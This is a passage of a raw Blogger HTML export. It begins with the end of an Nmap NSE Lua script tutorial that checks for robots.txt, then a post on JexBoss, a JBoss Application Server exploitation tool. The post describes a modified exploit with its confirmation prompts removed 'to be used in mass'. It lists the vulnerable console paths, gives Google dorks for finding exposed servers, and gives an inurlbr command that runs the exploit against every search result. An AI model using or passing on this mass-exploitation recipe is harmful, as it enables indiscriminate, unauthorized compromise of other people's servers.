</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #0000aa;">table.insert</span><span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">,</span> <span class="st0" style="color: #ff6666;">" returned 404 NOT FOUND"</span><span class="br0" style="color: #66cc66;">)</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">else</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #0000aa;">table.insert</span><span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">,</span> <span class="st0" style="color: #ff6666;">" STRING : "</span><span class="sy0" style="color: #66cc66;">..</span>file<span class="br0" style="color: #66cc66;">)</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #0000aa;">table.insert</span><span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">,</span> <span class="st0" style="color: #ff6666;">" returned "</span><span class="sy0" style="color: #66cc66;">..</span>response<span class="sy0" style="color: #66cc66;">.</span>status<span class="br0" style="color: #66cc66;">)</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">end</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><span class="kw1" style="color: #aa9900; font-weight: bold;"><br /></span></li>
<li class="li1" style="-webkit-user-select: none;">--writting response output to table</li>
<li class="li2" style="-webkit-user-select: none;"><span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> stdnse<span class="sy0" style="color: #66cc66;">.</span>format_output<span class="br0" style="color: #66cc66;">(</span><span class="kw4" style="color: #aa9900;">true</span><span class="sy0" style="color: #66cc66;">,</span> response<span class="br0" style="color: #66cc66;">)</span><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">end</span></div>
</li>
</ol>
<div style="text-align: start;">
<br />
<b></b><br />
<center>
<b>usando stdnse.output_table()</b></center>
<br />
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px; text-align: start;">
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- writting output to table using stdnse.output_table()</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- THE RULES SECTION --</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">local</span> file <span class="sy0" style="color: #66cc66;">=</span> stdnse<span class="sy0" style="color: #66cc66;">.</span>get_script_args<span class="br0" style="color: #66cc66;">(</span>SCRIPT_NAME<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">".file"</span><span class="br0" style="color: #66cc66;">)</span> <span class="kw2" style="color: #aa9900; font-weight: bold;">or</span> <span class="st0" style="color: #ff6666;">"/robots.txt"</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">local</span> output <span class="sy0" style="color: #66cc66;">=</span> stdnse<span class="sy0" style="color: #66cc66;">.</span>output_table<span class="br0" style="color: #66cc66;">(</span><span class="br0" style="color: #66cc66;">) </span><span class="br0"> --</span><span class="br0" style="color: #66cc66;"> </span><span class="br0">fazendo table em 'the rules section'</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- THE ACTION SECTION --</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">if</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">200</span><span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
output<span class="sy0" style="color: #66cc66;">.</span>found <span class="sy0" style="color: #66cc66;">=</span> <span class="br0" style="color: #66cc66;">{</span><span class="br0" style="color: #66cc66;">}</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
output<span class="sy0" style="color: #66cc66;">.</span>found<span class="br0" style="color: #66cc66;">[</span><span class="sy0" style="color: #66cc66;">#</span>output<span class="sy0" style="color: #66cc66;">.</span>found <span class="sy0" style="color: #66cc66;">+</span> <span class="nu0" style="color: #cc66cc;">1</span><span class="br0" style="color: #66cc66;">]</span> <span class="sy0" style="color: #66cc66;">=</span> file</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
output<span class="sy0" style="color: #66cc66;">.</span>found<span class="br0" style="color: #66cc66;">[</span><span class="sy0" style="color: #66cc66;">#</span>output<span class="sy0" style="color: #66cc66;">.</span>found <span class="sy0" style="color: #66cc66;">+</span> <span class="nu0" style="color: #cc66cc;">1</span><span class="br0" style="color: #66cc66;">]</span> <span class="sy0" style="color: #66cc66;">=</span> <span class="st0" style="color: #ff6666;">"/privacy/"</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
output<span class="sy0" style="color: #66cc66;">.</span>found<span class="br0" style="color: #66cc66;">[</span><span class="sy0" style="color: #66cc66;">#</span>output<span class="sy0" style="color: #66cc66;">.</span>found <span class="sy0" style="color: #66cc66;">+</span> <span class="nu0" style="color: #cc66cc;">1</span><span class="br0" style="color: #66cc66;">]</span> <span class="sy0" style="color: #66cc66;">=</span> <span class="st0" style="color: #ff6666;">"/news/"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> output</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">elseif</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">404</span><span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
output<span class="sy0" style="color: #66cc66;">.</span>found <span class="sy0" style="color: #66cc66;">=</span> <span class="br0" style="color: #66cc66;">{</span><span class="br0" style="color: #66cc66;">}</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
output<span class="sy0" style="color: #66cc66;">.</span>found<span class="br0" style="color: #66cc66;">[</span><span class="sy0" style="color: #66cc66;">#</span>output<span class="sy0" style="color: #66cc66;">.</span>found <span class="sy0" style="color: #66cc66;">+</span> <span class="nu0" style="color: #cc66cc;">1</span><span class="br0" style="color: #66cc66;">]</span> <span class="sy0" style="color: #66cc66;">=</span> file</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
output<span class="sy0" style="color: #66cc66;">.</span>found<span class="br0" style="color: #66cc66;">[</span><span class="sy0" style="color: #66cc66;">#</span>output<span class="sy0" style="color: #66cc66;">.</span>found <span class="sy0" style="color: #66cc66;">+</span> <span class="nu0" style="color: #cc66cc;">1</span><span class="br0" style="color: #66cc66;">]</span> <span class="sy0" style="color: #66cc66;">=</span> <span class="st0" style="color: #ff6666;">"/privacy/"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
output<span class="sy0" style="color: #66cc66;">.</span>found<span class="br0" style="color: #66cc66;">[</span><span class="sy0" style="color: #66cc66;">#</span>output<span class="sy0" style="color: #66cc66;">.</span>found <span class="sy0" style="color: #66cc66;">+</span> <span class="nu0" style="color: #cc66cc;">1</span><span class="br0" style="color: #66cc66;">]</span> <span class="sy0" style="color: #66cc66;">=</span> <span class="st0" style="color: #ff6666;">"/news/"</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> output</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">else</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
output<span class="sy0" style="color: #66cc66;">.</span>found <span class="sy0" style="color: #66cc66;">=</span> <span class="br0" style="color: #66cc66;">{</span><span class="br0" style="color: #66cc66;">}</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
output<span class="sy0" style="color: #66cc66;">.</span>found<span class="br0" style="color: #66cc66;">[</span><span class="sy0" style="color: #66cc66;">#</span>output<span class="sy0" style="color: #66cc66;">.</span>found <span class="sy0" style="color: #66cc66;">+</span> <span class="nu0" style="color: #cc66cc;">1</span><span class="br0" style="color: #66cc66;">]</span> <span class="sy0" style="color: #66cc66;">=</span> file</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
output<span class="sy0" style="color: #66cc66;">.</span>found<span class="br0" style="color: #66cc66;">[</span><span class="sy0" style="color: #66cc66;">#</span>output<span class="sy0" style="color: #66cc66;">.</span>found <span class="sy0" style="color: #66cc66;">+</span> <span class="nu0" style="color: #cc66cc;">1</span><span class="br0" style="color: #66cc66;">]</span> <span class="sy0" style="color: #66cc66;">=</span> <span class="st0" style="color: #ff6666;">"/privacy/"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
output<span class="sy0" style="color: #66cc66;">.</span>found<span class="br0" style="color: #66cc66;">[</span><span class="sy0" style="color: #66cc66;">#</span>output<span class="sy0" style="color: #66cc66;">.</span>found <span class="sy0" style="color: #66cc66;">+</span> <span class="nu0" style="color: #cc66cc;">1</span><span class="br0" style="color: #66cc66;">]</span> <span class="sy0" style="color: #66cc66;">=</span> <span class="st0" style="color: #ff6666;">"/news/"</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> output</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">end</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> output</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">end</span></div>
</li>
</ol>
</div>
</div>
</div>
</center>
Anonymoushttp://www.blogger.com/profile/00185800187463626295noreply@blogger.com0tag:blogger.com,1999:blog-5670232360751087799.post-91550067068698347152015-06-19T18:16:00.002-03:002015-11-29T03:03:21.888-02:00JexBoss - Jboss Verify Tool - INURLBR Mass exploitation - <h3 style="text-align: center;">
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; font-size: large;"><span style="line-height: 25.6000003814697px;"><b>JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server.</b></span></span></h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOdMPvnVrTzRfgjGDc14ZCCsRwcRpRqAkD5tlKiHemwcZLAmeGGXR9es-OYj2BGHiIVDFkKrI2oZ8xn1g3LPn2eiZ3_XPGKRCGV2aVZzsKrxUdsB0949IhyphenhyphenQPsvTIC7AiUgwtd6jBSfejn/s1600/Captura+de+tela+de+2015-06-19+18%253A09%253A39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server. The script works, however ateramos the XPL order to use it in mass along with inurlbr scanner All latches and test questions were withdrawn in order to be used in mass was added fução to save vulnerable sites." border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOdMPvnVrTzRfgjGDc14ZCCsRwcRpRqAkD5tlKiHemwcZLAmeGGXR9es-OYj2BGHiIVDFkKrI2oZ8xn1g3LPn2eiZ3_XPGKRCGV2aVZzsKrxUdsB0949IhyphenhyphenQPsvTIC7AiUgwtd6jBSfejn/s640/Captura+de+tela+de+2015-06-19+18%253A09%253A39.png" title="JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server. The script works, however ateramos the XPL order to use it in mass along with inurlbr scanner All latches and test questions were withdrawn in order to be used in mass was added fução to save vulnerable sites." width="640" /></a></div>
<div>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; font-size: large;"><span style="line-height: 25.6000003814697px;"><b><br /></b></span></span></div>
<b style="font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: x-large; line-height: 25.6000003814697px;">Requirements</b><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">Python <= 2.7.x</span></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"><b><br /></b></span></span>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; font-size: large;"><span style="line-height: 25.6000003814697px;"><b>Installation</b></span></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">To install the latest version of JexBoss, please use the following commands:</span></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"><br /></span></span>
<span style="color: red; font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">git clone https://github.com/joaomatosf/jexboss.git</span></span><br />
<span style="color: red; font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">cd jexboss</span></span><br />
<span style="color: red; font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">python jexboss.py</span></span><br />
<br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"># <b> [ + ]</b> JexBoss v1.0. @autor: João Filho Matos Figueiredo (joaomatosf@gmail.com)</span></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"># <b> [ + ]</b> Updates: <a href="https://github.com/joaomatosf/jexboss">https://github.com/joaomatosf/jexboss</a></span></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"># <b> [ + ] </b>SCRIPT original: <a href="http://1337day.com/exploit/23507">http://1337day.com/exploit/23507</a> - </span></span><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; line-height: 25.6000003814697px;"><a href="http://77.120.105.55/exploit/23507">http://77.120.105.55/exploit/23507</a></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"># <b> [ + ] </b>Free for distribution and modification, but the authorship should be preserved.</span></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; font-size: large;"><span style="line-height: 25.6000003814697px;"><br /></span></span>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; font-size: large;"><span style="line-height: 25.6000003814697px;"><b>Features</b></span></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; line-height: 25.6000003814697px;">The tool and exploits were developed and tested for versions 3, 4, 5 and 6 of the JBoss Application Server.</span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"><br /></span></span>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; font-size: large;"><span style="line-height: 25.6000003814697px;"><b>The exploitation vectors are:</b></span></span><br />
<br />
<ol>
<li><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">/jmx-console - </span></span><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; line-height: 25.6000003814697px;">tested and working in JBoss versions 4, 5 and 6</span></li>
<li><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">/web-console/Invoker- </span></span><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; line-height: 25.6000003814697px;">tested and working in JBoss versions 4</span></li>
<li><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">/invoker/JMXInvokerServlet- </span></span><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; line-height: 25.6000003814697px;">tested and working in JBoss versions 4 and 5</span></li>
</ol>
<div>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"><br /></span></span></div>
<div>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; font-size: large;"><span style="line-height: 25.6000003814697px;"><i>The script works, however ateramos the XPL order to use it in mass along with <b>inurlbr</b> scanner </i></span></span></div>
<div>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">All latches and test questions were withdrawn in order to be used in mass was added function to save vulnerable sites.</span><br /><br /><span style="line-height: 25.6000003814697px;"><span style="font-size: large;"><b>Mass Exploration: </b></span></span></span></div>
<div>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">To do this we use the scanner inurlbr</span></span></div>
<div>
<span style="color: red; font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;"><a href="https://github.com/googleinurl/SCANNER-INURLBR">https://github.com/googleinurl/SCANNER-INURLBR</a></span></span><br />
<br /></div>
<div>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; font-size: large;"><span style="line-height: 25.6000003814697px;"><b>Modified script for mass exploitation: </b></span></span></div>
<div>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"><a href="https://gist.github.com/googleinurl/d9940803b101c9ebbf54#file-jexboss-py">https://gist.github.com/googleinurl/d9940803b101c9ebbf54#file-jexboss-py</a> </span><br /><br /><span style="line-height: 25.6000003814697px;"><span style="font-size: large;"><b>DORKS SEARCH </b></span></span></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">inurl:"jmx-console/HtmlAdaptor"</span></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">inurl:"</span></span><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; line-height: 25.6000003814697px;">/web-console/Invoker</span><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">"</span></span><br />
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; line-height: 25.6000003814697px;">inurl:"</span><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">/invoker/JMXInvokerServlet"</span></span><br />
<br />
<span style="font-size: large;"><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif; font-weight: bold;"><span style="line-height: 25.6000003814697px;">COMMAND INURLBR:</span></span><br /><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">- single search.</span></span></span><span style="color: red; font-family: "courier new" , "courier" , monospace; line-height: 25.6000003814697px;"><i>--dork {YOU_DORK}</i></span><span style="font-size: large;"><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"><br /></span></span></span><br />
<span style="line-height: 25.6000003814697px;"><span style="color: red; font-family: "courier new" , "courier" , monospace;">php inurlbr.php --dork 'inurl:"jmx-console/HtmlAdaptor"' -s output.txt -q all --unique --command-all "python JexBoss.py _TARGET_"</span></span></div>
<div>
<br /></div>
<div>
